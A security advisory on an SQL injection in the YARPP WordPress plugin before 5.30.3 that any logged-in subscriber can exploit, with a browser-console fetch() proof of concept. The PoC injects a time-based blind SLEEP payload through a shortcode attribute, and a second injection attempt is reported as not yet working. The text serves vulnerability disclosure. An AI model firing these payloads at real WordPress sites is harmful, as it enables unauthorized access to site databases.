YARPP - Yet Another Related Posts Plugin < 5.30.3 - Subscriber+ SQLi

The plugin does not validate and escape some of its shortcode attributes before using them in SQL statement/s, which could allow any authenticated users, such as subscribers to perform SQL Injection attacks.

PoC

Run the below command in the developer console of the web browser while being on the blog as a subscriber user (the reference id must be an existing post ID): fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: “action=parse-media-shortcode&shortcode;=[yarpp reference_id=‘1’ recent=‘1 DAY) AND (SELECT 42 FROM (SELECT(SLEEP(5)))b’]”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); (Could not exploit the below so far, despite the data being injected) fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: “action=parse-media-shortcode&shortcode;=[yarpp reference_id=‘1’ limit=‘aa YOLO bla-bla-bla’]”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data));